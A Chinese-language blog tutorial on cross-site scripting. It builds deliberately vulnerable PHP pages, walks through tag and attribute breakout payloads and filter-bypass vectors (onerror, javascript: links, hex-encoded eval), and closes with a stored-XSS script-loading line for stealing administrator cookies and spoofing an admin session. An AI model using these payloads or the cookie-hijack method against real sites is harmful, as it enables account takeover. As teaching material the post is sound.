参看:

XSS的原理分析与解剖

前端安全 -- XSS攻击

web大前端开发中一些常见的安全性问题

1、前言

XSS 是面试时,hr提出来给我的,然后大体的浏览一遍,今天才查阅资料大体了解了它。

XSS 攻击:攻击者向HTML页面传入恶意的HTML或JS代码,当用户浏览该页面时,恶意代码执行,达到攻击的目的。

2、原理实现

在本地搭建PHP环境(使用phpstudy安装),然后在index.php文件中输入一下代码:

<!DOCTYPE html>

<html>

<head>

  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

  <title>XSS原理重现</title>

</head>

<body>

<form action="" method="get">

  <input type="text" name="xss_input">

  <input type="submit">

</form>

<hr>

<?php

  header("X-XSS-Protection: 0"); // 0: 表示关闭浏览器的XSS防护机制

  error_reporting(0); // 加上error_reporting(0);就不会弹出警告了

  $xss = $_GET['xss_input'];

  echo '<h5>你输入的字符为</h5><br />'.$xss;

?>

</body>

</html>

现在在输入框中输入abc普通字符串,然后在页面中显示:

之后查看页面代码,就会发现页面上多了一行代码:

<!DOCTYPE html>

<html>

<head>

  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

  <title>XSS原理重现</title>

</head>

<body>

<form action="" method="get">

  <input type="text" name="xss_input">

  <input type="submit">

</form>

<hr>

    /*------多了的代码:123-------*/

<h5>你输入的字符为</h5><br />123</body>

</html>

此时,我要是在输入<script>alert('xss')</script>这种可以被解析的代码时:

现在页面就显现出xss漏洞了。

之后查看页面代码,就会发现页面上多了一行代码:

<!DOCTYPE html>

<html>

<head>

  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

  <title>XSS原理重现</title>

</head>

<body>

<form action="" method="get">

  <input type="text" name="xss_input">

  <input type="submit">

</form>

<hr>

/*------多了的代码:<script>alert('xss')</script>-------*/

// 代码出现在 br标签 和 body标签中

<h5>你输入的字符为</h5><br /><script>alert('xss')</script></body>

</html>

3、xss利用输出环境来构造代码

现在我要改变 xss 攻击:

以上测试是在,标签中插入scrpit标签达到攻击的目的;现在我想要在html页面标签的属性中插入xss攻击代码。因此,当你我输入<script>alert('xss')</script>,不会显示出弹框了。

3.1测试代码

<!DOCTYPE html>

<html>

<head>

  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

  <title>XSS利用输出的环境来构造代码</title>

</head>

<body>

  <center>

    <h6>把我们输入的字符串 输出到input里的value属性里</h6>

    <form action="" method="get">

      <h6>请输入你想显现的字符串</h6>

      <input type="text" name="xss_input_value" value="输入"><br>

      <input type="submit">

    </form>

    <hr>

    <?php

      header("X-XSS-Protection: 0");

      error_reporting(0);//加上error_reporting(0);就不会弹出警告了

      $xss = $_GET['xss_input_value'];

      if(isset($xss)){

      echo '<input type="text" value="'.$xss.'">';

      }else{

      echo '<input type="type" value="输出">';

      }

    ?>

  </center>

</body>

</html>

页面效果:

3.2 输入一

当我在输入框输入qwer字符串时,会在输出框显示我输入的字符串:

此时网页代码:

  <center>

    <h6>把我们输入的字符串 输出到input里的value属性里</h6>

    <form action="" method="get">

      <h6>请输入你想显现的字符串</h6>

      <input type="text" name="xss_input_value" value="输入"><br>

      <input type="submit">

    </form>

    <hr>

    <input type="text" value="qwer">  </center>

3.3输入二

现在我输入<script>alert('xss')</script>,字符串正常输入,明显的可以看到,并没有弹出对话框:

此时网页代码:

<body>

  <center>

    <h6>把我们输入的字符串 输出到input里的value属性里</h6>

    <form action="" method="get">

      <h6>请输入你想显现的字符串</h6>

      <input type="text" name="xss_input_value" value="输入"><br>

      <input type="submit">

    </form>

    <hr>

    <input type="text" value="<script>alert('xss')</script>">  </center>

</body>

分析输出代码:

<input type="text" value="<script>alert('xss')</script>">  </center>

3.4 输入三

如果我输入">,就会变成:

<input type="text" value=""> ">  </center>

input提前闭合了!之后的">就被舍弃了,变成了普通文本。

3.5 输入四

如果我输入:"><script>alert('xss')</script>

显示效果:

3.6 输入五

现在我不想显示弹框攻击了,我想触发某种事件实现攻击,那么就输入以下内容:

" onmousemove="alert('我就测试一下')"

显示结果:

页面代码:

  <center>

    <h6>把我们输入的字符串 输出到input里的value属性里</h6>

    <form action="" method="get">

      <h6>请输入你想显现的字符串</h6>

      <input type="text" name="xss_input_value" value="输入"><br>

      <input type="submit">

    </form>

    <hr>

    <input type="text" value="" onmousemove="alert('我就测试一下')"">  </center>

说明:输入以后,鼠标在移动是触发事件,形成xss攻击。

那么,我在<textarea> 标签中显示呢?

此时就这样输入:

</textarea> <script>alert(‘xss’)</script> // 就可以实现弹窗了

4、过滤的解决办法

假如说网站禁止过滤了script 这时该怎么办呢 ?

那么就需要记住:只要页面能触发你的js代码

有哪些方法呢?

<!-- 当找不到图片名为1的文件时,执行alert('xss') -->

<img scr=1 onerror=alert('xss')> 

<!-- 点击s时运行alert('xss') -->

<a href=javascrip:alert('xss')>s</a> 

<!-- 利用iframe的scr来弹窗 -->

<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>

 <!-- 过滤了alert来执行弹窗 -->

<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>

5、xss的利用

<script scr="js_url"></script>

<img src=x onerror=appendChild(createElement('script')).src='js_url' />

比如我们在网站的留言区输入<script scr=”js_url”></script>

当管理员进后台浏览留言的时候,就会触发

然后管理员的cookies和后台地址还有管理员浏览器版本等等

你都可以获取到了,再用“桂林老兵cookie欺骗工具”来更改你的cookies,

就可以不用输入账号 密码 验证码 就可以以管理员的方式来进行登录了。

前端安全之 XSS攻击的更多相关文章

  1. 前端安全之XSS攻击

    XSS(cross-site scripting跨域脚本攻击)攻击是最常见的Web攻击,其重点是“跨域”和“客户端执行”.有人将XSS攻击分为三种,分别是: 1. Reflected XSS(基于反射 ...

  2. 前端Hack之XSS攻击个人学习笔记

    简单概述 **        此篇系本人两周来学习XSS的一份个人总结,实质上应该是一份笔记,方便自己日后重新回来复习,文中涉及到的文章我都会在末尾尽可能地添加上,此次总结是我在学习过程中所写,如有任 ...

  3. 转:前端安全之XSS攻击

    前端安全 原文链接:https://www.freebuf.com/articles/web/185654.html 随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企 ...

  4. 前端安全之XSS攻击及防御

    xss攻击是什么 ? XSS攻击类似于SQL注入攻击,攻击之前,我们先找到一个存在XSS漏洞的网站,XSS漏洞分为两种,一种是DOM Based XSS漏洞,另一种是Stored XSS漏洞.理论上, ...

  5. XSS攻击的解决方法

    在我上一篇<前端安全之XSS攻击>文中,并没有把XSS攻击的解决办法说完整,而XSS的攻击又那么五花八门,有没有一招“独孤九剑”能够抗衡,毕竟那么多情况场景,开发人员无法一一照顾过来,而今 ...

  6. 前端安全(XSS、CSRF防御)

    一.网络安全          OWASP:开放式Web应用程序安全项目(OWASP,Open Web Application Security Project)        OWASP是一个开源的 ...

  7. 前端安全之CSRF攻击

    前端安全之CSRF攻击 转载请注明出处:unclekeith: 前端安全之CSRF攻击 CSRF定义 CSRF,即(Cross-site request forgery), 中文名为跨站请求伪造.是一 ...

  8. 前端过滤XSS攻击

    日常开发过程中,对于存在用户交互的一些门户网站等,过滤xss攻击是必不可少的. 此处主要记录下我在工作过程中的简单处理方法. 前端过滤XSS攻击, 我这里用的是开源工程 js-xss,官网地址:htt ...

  9. 转---如何让前端更安全?——XSS攻击和防御详解

    前言 平时很少关注安全这块的技术,曾经也买过一本<Web前端黑客技术揭秘>但至今还没翻过,尴尬.今天的早读文章由腾讯优测@小吉带来的分享. 正文从这开始~ 最近深入了解了一下XSS攻击.以 ...

随机推荐

  1. springMVC的执行请求过程

    springMVC的运行流程: 1.用户发送请求至前端控制器DispatcherServlet 2.DispatcherServlet收到请求调用HandlerMapping处理器映射器 3.处理器映 ...

  2. centos 访问win共享

    yum install samba 安装samba (其实我们只用到samba里面的winbind以便我们能够用windows机器的名称找到该机器的网络地址,在下面叙述的过程会用到.而且也要确定在 w ...

  3. 【Python基础知识】【语法】【入门】

    一.Python概述 Python是一门面向对象的编程语言,拥有强大丰富的库,没有操作系统的限制,是一种优美.清晰的编程语言. 二.Python基础语法 1.Python标识符 标识符就是程序中定义的 ...

  4. 剑指 offer 树的子结构

    题目描述: 输入两棵二叉树A,B,判断B是不是A的子结构.(ps:我们约定空树不是任意一个树的子结构). 第一遍没写出来错误点:认为首先应该找到pRoot1等于pRoot2的节点,但是递归就是自己在不 ...

  5. Day2-D-Oil Deposits-POJ-1562

    The GeoSurvComp geologic survey company is responsible for detecting underground oil deposits. GeoSu ...

  6. docker幕布笔记

    幕布链接>>>>https://mubu.com/doc/l_KDT3S5w0

  7. Java 变参函数的实现

      Java的变参函数实现实际上参数是一个数组,其简单用法如下 public class variableParamTest { private static void variableParam(O ...

  8. 4K对齐

    4K对齐这个概念常常与固态硬盘联系起来.买了一块固态硬盘,装机过程中时有忽略4K对齐这个小细节,但是这个小细节往往十分重要,它影响硬盘的使用寿命和速度. 现在来了解一下4K对齐到底是个什么东西. 一. ...

  9. what to do in next ten years

    除了深造编程功力,还要有: 烹饪(川菜湘菜,药膳) 吉他 摄影 四书五经,诗词经典 毛笔字书法 可报班,可搜教程自学

  10. Redis的下载与安装

    1). 从官网上下载Redis的压缩包   2). 将压缩包解压到 某个指定的文件目录中         tar -xzvf redis-4.0.9.tar.gz  /xx/xx/xx_dir   3 ...